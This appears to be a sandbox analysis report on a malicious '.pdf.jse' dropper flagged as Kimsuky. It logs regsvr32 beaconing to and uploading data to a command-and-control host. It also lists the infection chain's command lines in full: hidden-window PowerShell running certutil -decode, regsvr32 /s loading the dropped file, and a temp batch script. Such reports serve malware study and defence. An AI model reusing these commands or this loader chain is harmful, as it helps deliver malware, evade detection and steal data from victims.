Timestamp	kBytes transferred	Direction	Data
Aug 25, 2021 11:00:11.381963015 CEST	75	OUT	POST //?m=c&p1=8ace1190 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36 Host: texts.letterpaper.press Content-Length: 0 Cache-Control: no-cache

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
16	192.168.1.103	49719	50.17.5.224	80	C:\Windows\System32\regsvr32.exe

Timestamp	kBytes transferred	Direction	Data
Aug 25, 2021 11:00:15.465219021 CEST	76	OUT	POST //?m=a&p1=8ace1190&p2=Win10.0.17134x64-S_Regsvr32-v2.0.69 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36 Host: texts.letterpaper.press Content-Length: 0 Cache-Control: no-cache

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
17	192.168.1.103	49718	50.17.5.224	80	C:\Windows\System32\regsvr32.exe

Timestamp	kBytes transferred	Direction	Data
Aug 25, 2021 11:00:15.465665102 CEST	76	OUT	POST //?m=c&p1=8ace1190 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36 Host: texts.letterpaper.press Content-Length: 0 Cache-Control: no-cache

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
2	192.168.1.103	49704	50.17.5.224	80	C:\Windows\System32\regsvr32.exe

Timestamp	kBytes transferred	Direction	Data
Aug 25, 2021 10:59:30.572340012 CEST	16	OUT	POST //?m=c&p1=8ace1190 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36 Host: texts.letterpaper.press Content-Length: 0 Cache-Control: no-cache

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
3	192.168.1.103	49705	50.17.5.224	80	C:\Windows\System32\regsvr32.exe

Timestamp	kBytes transferred	Direction	Data
Aug 25, 2021 10:59:30.574069023 CEST	16	OUT	POST //?m=a&p1=8ace1190&p2=Win10.0.17134x64-S_Regsvr32-v2.0.69 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36 Host: texts.letterpaper.press Content-Length: 0 Cache-Control: no-cache

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
4	192.168.1.103	49707	50.17.5.224	80	C:\Windows\System32\regsvr32.exe

Timestamp	kBytes transferred	Direction	Data
Aug 25, 2021 10:59:34.642611980 CEST	17	OUT	POST //?m=b&p1=8ace1190&p2=c HTTP/1.1 Content-Type: multipart/form-data; boundary=--7263b57d61acd27d98a454fc484795fe0106d5 Content-Length: 45838 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36 Host: texts.letterpaper.press Connection: Keep-Alive Cache-Control: no-cache
Aug 25, 2021 10:59:34.643527985 CEST	22	OUT	Data Raw: 2d 2d 2d 2d 37 32 36 33 62 35 37 64 36 31 61 63 64 32 37 64 39 38 61 34 35 34 66 63 34 38 34 37 39 35 66 65 30 31 30 36 64 35 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 Data Ascii: ----7263b57d61acd27d98a454fc484795fe0106d5Content-Disposition: form-data; name="binary"; filename="2021-08-25_10-59-22-966"Content-Type: application/octet-stream%PDF-1.7..4 0 objKM!Xk'u:U?0krV}'+RnB)+gS+G
Aug 25, 2021 10:59:35.661277056 CEST	23	OUT	Data Raw: c5 57 7e 60 22 09 99 1d e5 0d 1c 0f f9 02 1e 28 b2 e3 de fa c6 ae 3c d6 46 1b bf bf 24 cf 89 1d b0 80 54 e0 5f 77 2c 1f 2a 94 3d d9 fd d1 6b a8 8d 46 2e 58 31 c2 06 09 e1 a9 ec 57 03 20 a4 35 be 07 a2 90 1d 2d cf 2a 9f 24 07 28 5e c1 4d f2 b3 ca Data Ascii: W~`"(<F$T_w,=kF.X1W 5-$(^MP\|}gJ]mPBvS_Y}#[#IL90?v`EaEkr; APc:%j4@FTX!vq!AS1kT^Nt]h&D[QS]G'@
Aug 25, 2021 10:59:35.661452055 CEST	31	OUT	Data Raw: ea c6 d4 8c 6a 59 3d 46 3d 59 02 7a 59 d4 1a 04 1d cc 4b 28 3e 09 f7 51 aa f9 0e ca 5f e8 5c b0 f6 d0 ef 09 e0 9c c1 17 7f 7e 24 00 54 f1 65 2a 93 0e d8 84 3c 01 63 7e 25 0f ff af e1 31 31 0c 96 75 dd 31 a3 70 39 27 7e 5f 2b 5a 76 60 b1 a0 30 2a Data Ascii: jY=F=YzYK(>Q_\~$Te<c~%11u1p9'~_+Zv`0 ].6]hC/n)4PJNo+H_+@}@1K\/eTBi1]1Po"mT(?`&47\|%p,@Bq)^mkx3n V\=8[<
Aug 25, 2021 10:59:35.661602974 CEST	33	OUT	Data Raw: 58 3d a7 51 03 45 33 1f 9a 6b 06 04 0a 16 73 6f 4b 87 ab 76 a2 36 49 bb 72 e6 63 f8 c6 0a 6d 71 1f d1 a7 69 be b2 56 87 bc bc 7d 0c 68 17 f3 bc 08 51 a0 34 75 1e 1c 3c e1 0b bd c8 66 1f 0e ef 76 a6 aa e9 a3 36 fc e8 53 de 75 60 18 b5 f0 55 bc 36 Data Ascii: X=QE3ksoKv6IrcmqiV}hQ4u<fv6Su`U6S.vIFYTSk"5$g#"\|uP+n)_q)P,]jw/r>cO]{NY\6C<1S$%XrwgA7:>8@Fu*
Aug 25, 2021 10:59:36.681978941 CEST	38	OUT	Data Raw: c1 d6 e3 ac 0b 7d 00 96 42 28 4c b4 46 6b f3 80 22 82 02 4b 7b 2d 39 7c 01 05 5a 93 22 35 25 0d b8 61 48 f3 a0 fa f5 0b 80 bf 3c 24 6f ed d7 0f f3 01 e0 da 36 bc ce d4 d9 5b 04 a0 eb 9e 1a 42 27 1c 5d 9e dd e3 87 ce 6a 53 2a 07 ac 2a ec 1f a7 c9 Data Ascii: }B(LFk"K{-9\|Z"5%aH<$o6[B']jS*rba` ~o$YEyL`3})JKD9SoH;09"U"j[0,fm-HU<v#6aT^-(S0os}Z'OtW
Aug 25, 2021 10:59:36.682291031 CEST	54	OUT	Data Raw: 0c df 7e fc b7 bd b0 04 a3 b2 f1 a2 e0 42 c9 32 a2 ba 58 59 e8 a2 53 19 e9 6d e6 15 5d 93 61 78 24 c5 a8 ec 19 7f 87 5d c5 7e 16 32 80 38 2d f6 f0 f6 40 f5 3a 27 79 95 cf a7 72 65 3d 4a cc 63 82 9f 95 4e d8 33 72 2a ed e4 50 74 ff eb 69 d4 42 d2 Data Ascii: ~B2XYSm]ax$]~28-@:'yre=JcN3rPtiBpl7\|R!+;)tv=[ium>bG4x(lS2oWNAm#Y_?i,DEI(Ij1s"E?\|83sCdcOit-n>Pexg6}*
Aug 25, 2021 10:59:37.702500105 CEST	59	OUT	Data Raw: 3e 8d 8d 91 fa f2 2d aa c3 c7 79 04 4b 02 37 63 45 36 cc 9f 43 72 5d 75 49 38 e2 1b 5e fe 1f ce a4 c1 9f b5 79 97 a8 54 df 0f ba 58 2c c2 75 77 d5 09 cb 03 b1 cc be 2a b1 a4 fa 4f 8a 62 73 09 0b 00 6a 44 fa c9 c5 83 b9 99 53 29 ea a7 1a 8b ea c3 Data Ascii: >-yK7cE6Cr]uI8^yTX,uw*ObsjDS)1\(^ qCK;qoF~jSynS=7?97@#kD;-)K:R}6<`/}PNl-d06'/WGj;g+0:.IL8JU&f
Aug 25, 2021 10:59:37.702645063 CEST	66	OUT	Data Raw: a5 43 f0 88 00 65 05 85 8a b7 53 50 94 61 63 98 51 e9 bc ec e9 c8 89 44 00 50 b0 5f ad 3b d3 b1 6d 4c 77 0b 35 8a 8c 66 15 20 af 3b 30 d0 30 5b 81 f2 f3 3d 80 09 14 cd b1 e6 e4 21 f0 67 b9 82 d8 88 a8 cb cb 3d 81 fc 75 97 fa 16 f1 80 25 5d 6d fd Data Ascii: CeSPacQDP_;mLw5f ;00[=!g=u%]m4\|]A$=V$m[Z\|)#?,b,-L=9q2>sbe\$#`_Yic.3,_9?ICH:F<&CFwc&npG

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
5	192.168.1.103	49706	50.17.5.224	80	C:\Windows\System32\regsvr32.exe

Timestamp	kBytes transferred	Direction	Data
Aug 25, 2021 10:59:34.642957926 CEST	18	OUT	POST //?m=a&p1=8ace1190&p2=Win10.0.17134x64-S_Regsvr32-v2.0.69 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36 Host: texts.letterpaper.press Content-Length: 0 Cache-Control: no-cache

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
6	192.168.1.103	49708	50.17.5.224	80	C:\Windows\System32\regsvr32.exe

Timestamp	kBytes transferred	Direction	Data
Aug 25, 2021 10:59:47.898830891 CEST	70	OUT	POST //?m=a&p1=8ace1190&p2=Win10.0.17134x64-S_Regsvr32-v2.0.69 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36 Host: texts.letterpaper.press Content-Length: 0 Cache-Control: no-cache

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
7	192.168.1.103	49709	50.17.5.224	80	C:\Windows\System32\regsvr32.exe

Timestamp	kBytes transferred	Direction	Data
Aug 25, 2021 10:59:47.899632931 CEST	70	OUT	POST //?m=a&p1=8ace1190&p2=Win10.0.17134x64-S_Regsvr32-v2.0.69 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36 Host: texts.letterpaper.press Content-Length: 0 Cache-Control: no-cache

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
8	192.168.1.103	49710	50.17.5.224	80	C:\Windows\System32\regsvr32.exe

Timestamp	kBytes transferred	Direction	Data
Aug 25, 2021 10:59:53.001545906 CEST	71	OUT	POST //?m=c&p1=8ace1190 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36 Host: texts.letterpaper.press Content-Length: 0 Cache-Control: no-cache

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
9	192.168.1.103	49711	50.17.5.224	80	C:\Windows\System32\regsvr32.exe

Timestamp	kBytes transferred	Direction	Data
Aug 25, 2021 10:59:53.001627922 CEST	72	OUT	POST //?m=c&p1=8ace1190 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36 Host: texts.letterpaper.press Content-Length: 0 Cache-Control: no-cache

Code Manipulations

Statistics

CPU Usage

Click to jump to process

Memory Usage

Click to jump to process

High Level Behavior Distribution

Click to dive into process behavior distribution

Behavior

Click to jump to process

System Behavior

Analysis Process: wscript.exe PID: 7044 Parent PID: 3588

General

Start time:	10:58:08
Start date:	25/08/2021
Path:	C:\Windows\System32\wscript.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\wscript.exe 'C:\Users\user\Desktop\x110bx116cx1100x116dx1107x116e x1100x1161x1111x1161x11ab 2021-05-07.pdf.jse'
Imagebase:	0x7ff7d2c70000
File size:	163840 bytes
MD5 hash:	9A68ADD12EB50DDE7586782C3EB9FF9C
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: Certutil_Decode_OR_Download, Description: Certutil Decode, Source: 00000000.00000002.562447318.0000027E99742000.00000004.00000001.sdmp, Author: Florian Roth Rule: Certutil_Decode_OR_Download, Description: Certutil Decode, Source: 00000000.00000003.536073175.0000027E9967A000.00000004.00000001.sdmp, Author: Florian Roth Rule: Certutil_Decode_OR_Download, Description: Certutil Decode, Source: 00000000.00000003.537403999.0000027E996A4000.00000004.00000001.sdmp, Author: Florian Roth Rule: Certutil_Decode_OR_Download, Description: Certutil Decode, Source: 00000000.00000003.544459351.0000027E99732000.00000004.00000001.sdmp, Author: Florian Roth Rule: Certutil_Decode_OR_Download, Description: Certutil Decode, Source: 00000000.00000003.534562796.0000027E99708000.00000004.00000001.sdmp, Author: Florian Roth Rule: Certutil_Decode_OR_Download, Description: Certutil Decode, Source: 00000000.00000003.534889418.0000027E99708000.00000004.00000001.sdmp, Author: Florian Roth Rule: Certutil_Decode_OR_Download, Description: Certutil Decode, Source: 00000000.00000003.546366739.0000027E9B3E9000.00000004.00000001.sdmp, Author: Florian Roth Rule: Certutil_Decode_OR_Download, Description: Certutil Decode, Source: 00000000.00000002.562500921.0000027E9993A000.00000004.00000040.sdmp, Author: Florian Roth Rule: Certutil_Decode_OR_Download, Description: Certutil Decode, Source: 00000000.00000003.535487473.0000027E9CCB6000.00000004.00000001.sdmp, Author: Florian Roth Rule: SUSP_Double_Base64_Encoded_Executable, Description: Detects an executable that has been encoded with base64 twice, Source: 00000000.00000003.535487473.0000027E9CCB6000.00000004.00000001.sdmp, Author: Florian Roth Rule: Certutil_Decode_OR_Download, Description: Certutil Decode, Source: 00000000.00000003.545823503.0000027E9CCB6000.00000004.00000001.sdmp, Author: Florian Roth Rule: SUSP_Double_Base64_Encoded_Executable, Description: Detects an executable that has been encoded with base64 twice, Source: 00000000.00000003.545823503.0000027E9CCB6000.00000004.00000001.sdmp, Author: Florian Roth Rule: Certutil_Decode_OR_Download, Description: Certutil Decode, Source: 00000000.00000003.559995374.0000027E99740000.00000004.00000001.sdmp, Author: Florian Roth Rule: Certutil_Decode_OR_Download, Description: Certutil Decode, Source: 00000000.00000003.399402263.0000027E9B3C3000.00000004.00000001.sdmp, Author: Florian Roth Rule: SUSP_Double_Base64_Encoded_Executable, Description: Detects an executable that has been encoded with base64 twice, Source: 00000000.00000002.562513728.0000027E9993D000.00000004.00000001.sdmp, Author: Florian Roth Rule: SUSP_Double_Base64_Encoded_Executable, Description: Detects an executable that has been encoded with base64 twice, Source: 00000000.00000003.547005043.0000027E9B3CF000.00000004.00000001.sdmp, Author: Florian Roth Rule: Certutil_Decode_OR_Download, Description: Certutil Decode, Source: 00000000.00000003.427755304.0000027E9B3E1000.00000004.00000001.sdmp, Author: Florian Roth Rule: SUSP_Double_Base64_Encoded_Executable, Description: Detects an executable that has been encoded with base64 twice, Source: 00000000.00000003.427755304.0000027E9B3E1000.00000004.00000001.sdmp, Author: Florian Roth Rule: SUSP_Double_Base64_Encoded_Executable, Description: Detects an executable that has been encoded with base64 twice, Source: 00000000.00000003.547727779.0000027E9B3E1000.00000004.00000001.sdmp, Author: Florian Roth Rule: Certutil_Decode_OR_Download, Description: Certutil Decode, Source: 00000000.00000003.534727641.0000027E99677000.00000004.00000001.sdmp, Author: Florian Roth Rule: Certutil_Decode_OR_Download, Description: Certutil Decode, Source: 00000000.00000003.559503063.0000027E996A5000.00000004.00000001.sdmp, Author: Florian Roth Rule: SUSP_Double_Base64_Encoded_Executable, Description: Detects an executable that has been encoded with base64 twice, Source: 00000000.00000003.551541440.0000027E9CD90000.00000004.00000001.sdmp, Author: Florian Roth Rule: Certutil_Decode_OR_Download, Description: Certutil Decode, Source: 00000000.00000003.559948938.0000027EB69DF000.00000004.00000001.sdmp, Author: Florian Roth Rule: Certutil_Decode_OR_Download, Description: Certutil Decode, Source: 00000000.00000003.559831762.0000027E996A5000.00000004.00000001.sdmp, Author: Florian Roth Rule: Certutil_Decode_OR_Download, Description: Certutil Decode, Source: 00000000.00000003.539482612.0000027E99715000.00000004.00000001.sdmp, Author: Florian Roth Rule: SUSP_Double_Base64_Encoded_Executable, Description: Detects an executable that has been encoded with base64 twice, Source: 00000000.00000002.569744930.0000027E9B3E2000.00000004.00000001.sdmp, Author: Florian Roth Rule: Certutil_Decode_OR_Download, Description: Certutil Decode, Source: 00000000.00000003.534340935.0000027E9CCC6000.00000004.00000001.sdmp, Author: Florian Roth Rule: Certutil_Decode_OR_Download, Description: Certutil Decode, Source: 00000000.00000002.571001527.0000027E9CCB6000.00000004.00000001.sdmp, Author: Florian Roth Rule: SUSP_Double_Base64_Encoded_Executable, Description: Detects an executable that has been encoded with base64 twice, Source: 00000000.00000002.571001527.0000027E9CCB6000.00000004.00000001.sdmp, Author: Florian Roth Rule: SUSP_Double_Base64_Encoded_Executable, Description: Detects an executable that has been encoded with base64 twice, Source: 00000000.00000003.546419483.0000027E9B3C6000.00000004.00000001.sdmp, Author: Florian Roth Rule: Certutil_Decode_OR_Download, Description: Certutil Decode, Source: 00000000.00000003.549235895.0000027E99939000.00000004.00000001.sdmp, Author: Florian Roth Rule: Certutil_Decode_OR_Download, Description: Certutil Decode, Source: 00000000.00000003.540876716.0000027E9972A000.00000004.00000001.sdmp, Author: Florian Roth Rule: Certutil_Decode_OR_Download, Description: Certutil Decode, Source: 00000000.00000002.570828518.0000027E9CC69000.00000004.00000001.sdmp, Author: Florian Roth Rule: Certutil_Decode_OR_Download, Description: Certutil Decode, Source: 00000000.00000002.571040593.0000027E9CCC6000.00000004.00000001.sdmp, Author: Florian Roth Rule: SUSP_Double_Base64_Encoded_Executable, Description: Detects an executable that has been encoded with base64 twice, Source: 00000000.00000003.547572927.0000027E9993C000.00000004.00000001.sdmp, Author: Florian Roth
Reputation:	high

Chronological Activities

Analysis Process: AcroRd32.exe PID: 3380 Parent PID: 7044

General

Start time:	10:58:24
Start date:	25/08/2021
Path:	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe
Wow64 process (32bit):	true
Commandline:	'C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe' 'C:\ProgramData\ 2021-05-07.pdf'
Imagebase:	0x1c0000
File size:	2459120 bytes
MD5 hash:	84E2B28A5B7221B3AAB82CD7CA4D6619
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: AcroRd32.exe PID: 5476 Parent PID: 3380

General

Start time:	10:58:26
Start date:	25/08/2021
Path:	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe
Wow64 process (32bit):	true
Commandline:	'C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe' --type=renderer /prefetch:1 'C:\ProgramData\ 2021-05-07.pdf'
Imagebase:	0x1c0000
File size:	2459120 bytes
MD5 hash:	84E2B28A5B7221B3AAB82CD7CA4D6619
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: powershell.exe PID: 304 Parent PID: 7044

General

Start time:	10:58:24
Start date:	25/08/2021
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -windowstyle hidden certutil -decode C:\Windows\..\ProgramData\efVo8cq.sIhn C:\Windows\..\ProgramData\glK7UwV.pR9a
Imagebase:	0x7ff7c39f0000
File size:	447488 bytes
MD5 hash:	95000560239032BC68B4C2FDFCDEF913
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	.Net C# or VB.NET
Yara matches:	Rule: Certutil_Decode_OR_Download, Description: Certutil Decode, Source: 00000004.00000002.445490921.0000022E1F0E2000.00000004.00000020.sdmp, Author: Florian Roth Rule: Certutil_Decode_OR_Download, Description: Certutil Decode, Source: 00000004.00000002.454006767.0000022E214AA000.00000004.00000001.sdmp, Author: Florian Roth Rule: Certutil_Decode_OR_Download, Description: Certutil Decode, Source: 00000004.00000002.453909044.0000022E2144F000.00000004.00000001.sdmp, Author: Florian Roth Rule: Certutil_Decode_OR_Download, Description: Certutil Decode, Source: 00000004.00000002.445327272.0000022E1F060000.00000004.00000020.sdmp, Author: Florian Roth Rule: Certutil_Decode_OR_Download, Description: Certutil Decode, Source: 00000004.00000002.453777516.0000022E213DE000.00000004.00000001.sdmp, Author: Florian Roth Rule: Certutil_Decode_OR_Download, Description: Certutil Decode, Source: 00000004.00000002.452214006.0000022E20FF2000.00000004.00000001.sdmp, Author: Florian Roth
Reputation:	high

Chronological Activities

Analysis Process: conhost.exe PID: 5460 Parent PID: 304

General

Start time:	10:58:25
Start date:	25/08/2021
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7a3f70000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: certutil.exe PID: 1736 Parent PID: 304

General

Start time:	10:58:29
Start date:	25/08/2021
Path:	C:\Windows\System32\certutil.exe
Wow64 process (32bit):	false
Commandline:	'C:\Windows\system32\certutil.exe' -decode C:\Windows\..\ProgramData\efVo8cq.sIhn C:\Windows\..\ProgramData\glK7UwV.pR9a
Imagebase:	0x7ff6a6b40000
File size:	1557504 bytes
MD5 hash:	EB199893441CED4BBBCB547FE411CF2D
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	moderate

Chronological Activities

Analysis Process: RdrCEF.exe PID: 3972 Parent PID: 3380

General

Start time:	10:58:38
Start date:	25/08/2021
Path:	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
Wow64 process (32bit):	true
Commandline:	'C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe' --backgroundcolor=16514043
Imagebase:	0xde0000
File size:	9805296 bytes
MD5 hash:	C4531F5D235167293675FF6CE5472440
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: RdrCEF.exe PID: 6412 Parent PID: 3972

General

Start time:	10:58:47
Start date:	25/08/2021
Path:	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
Wow64 process (32bit):	true
Commandline:	'C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe' --type=gpu-process --disable-pack-loading --lang=en-US --log-file='C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log' --log-severity=disable --product-version='ReaderServices/19.8.20080 Chrome/64.0.3282.119' --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x8086 --gpu-device-id=0xbeef --gpu-driver-vendor='Google Inc.' --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file='C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log' --log-severity=disable --product-version='ReaderServices/19.8.20080 Chrome/64.0.3282.119' --service-request-channel-token=83FD662E69ECF919D8944D885F919F9E --mojo-platform-channel-handle=1612 --allow-no-sandbox-job --ignored=' --type=renderer ' /prefetch:2
Imagebase:	0xde0000
File size:	9805296 bytes
MD5 hash:	C4531F5D235167293675FF6CE5472440
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: powershell.exe PID: 4168 Parent PID: 7044

General

Start time:	10:58:47
Start date:	25/08/2021
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -windowstyle hidden regsvr32.exe /s C:\Windows\..\ProgramData\glK7UwV.pR9a
Imagebase:	0x7ff7c39f0000
File size:	447488 bytes
MD5 hash:	95000560239032BC68B4C2FDFCDEF913
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	.Net C# or VB.NET
Reputation:	high

Chronological Activities

Analysis Process: RdrCEF.exe PID: 5892 Parent PID: 3972

General

Start time:	10:58:55
Start date:	25/08/2021
Path:	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
Wow64 process (32bit):	true
Commandline:	'C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe' --type=renderer --disable-browser-side-navigation --disable-gpu-compositing --service-pipe-token=78C7EE079D4F1A6B9C0BFB5504293DE7 --lang=en-US --disable-pack-loading --lang=en-US --log-file='C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log' --log-severity=disable --product-version='ReaderServices/19.8.20080 Chrome/64.0.3282.119' --enable-pinch --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --enable-gpu-async-worker-context --content-image-texture-target=0,0,3553;0,1,3553;0,2,3553;0,3,3553;0,4,3553;0,5,3553;0,6,3553;0,7,3553;0,8,3553;0,9,3553;0,10,3553;0,11,3553;0,12,3553;0,13,3553;0,14,3553;0,15,3553;0,16,3553;0,17,3553;0,18,3553;1,0,3553;1,1,3553;1,2,3553;1,3,3553;1,4,3553;1,5,3553;1,6,3553;1,7,3553;1,8,3553;1,9,3553;1,10,3553;1,11,3553;1,12,3553;1,13,3553;1,14,3553;1,15,3553;1,16,3553;1,17,3553;1,18,3553;2,0,3553;2,1,3553;2,2,3553;2,3,3553;2,4,3553;2,5,3553;2,6,3553;2,7,3553;2,8,3553;2,9,3553;2,10,3553;2,11,3553;2,12,3553;2,13,3553;2,14,3553;2,15,3553;2,16,3553;2,17,3553;2,18,3553;3,0,3553;3,1,3553;3,2,3553;3,3,3553;3,4,3553;3,5,3553;3,6,3553;3,7,3553;3,8,3553;3,9,3553;3,10,3553;3,11,3553;3,12,3553;3,13,3553;3,14,3553;3,15,3553;3,16,3553;3,17,3553;3,18,3553;4,0,3553;4,1,3553;4,2,3553;4,3,3553;4,4,3553;4,5,3553;4,6,3553;4,7,3553;4,8,3553;4,9,3553;4,10,3553;4,11,3553;4,12,3553;4,13,3553;4,14,3553;4,15,3553;4,16,3553;4,17,3553;4,18,3553;5,0,3553;5,1,3553;5,2,3553;5,3,3553;5,4,3553;5,5,3553;5,6,3553;5,7,3553;5,8,3553;5,9,3553;5,10,3553;5,11,3553;5,12,3553;5,13,3553;5,14,3553;5,15,3553;5,16,3553;5,17,3553;5,18,3553;6,0,3553;6,1,3553;6,2,3553;6,3,3553;6,4,3553;6,5,3553;6,6,3553;6,7,3553;6,8,3553;6,9,3553;6,10,3553;6,11,3553;6,12,3553;6,13,3553;6,14,3553;6,15,3553;6,16,3553;6,17,3553;6,18,3553 --disable-accelerated-video-decode --service-request-channel-token=78C7EE079D4F1A6B9C0BFB5504293DE7 --renderer-client-id=2 --mojo-platform-channel-handle=1620 --allow-no-sandbox-job /prefetch:1
Imagebase:	0xde0000
File size:	9805296 bytes
MD5 hash:	C4531F5D235167293675FF6CE5472440
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: conhost.exe PID: 5360 Parent PID: 4168

General

Start time:	10:58:47
Start date:	25/08/2021
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7a3f70000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: regsvr32.exe PID: 5280 Parent PID: 4168

General

Start time:	10:58:50
Start date:	25/08/2021
Path:	C:\Windows\System32\regsvr32.exe
Wow64 process (32bit):	false
Commandline:	'C:\Windows\system32\regsvr32.exe' /s C:\Windows\..\ProgramData\glK7UwV.pR9a
Imagebase:	0x7ff71df80000
File size:	24064 bytes
MD5 hash:	D78B75FC68247E8A63ACBA846182740E
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Kimsuky, Description: Yara detected Kimsuky, Source: 0000000D.00000002.506290165.00007FF983D91000.00000040.00020000.sdmp, Author: Joe Security
Reputation:	high

Chronological Activities

Analysis Process: cmd.exe PID: 4772 Parent PID: 5280

General

Start time:	10:58:51
Start date:	25/08/2021
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\cmd.exe /c C:\ProgramData\temp\C011.tmp.bat
Imagebase:	0x7ff6c71a0000
File size:	273920 bytes
MD5 hash:	4E2ACF4F8A396486AB4268C94A6A245F
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: conhost.exe PID: 4152 Parent PID: 4772

General

Start time:	10:58:52
Start date:	25/08/2021
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7a3f70000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

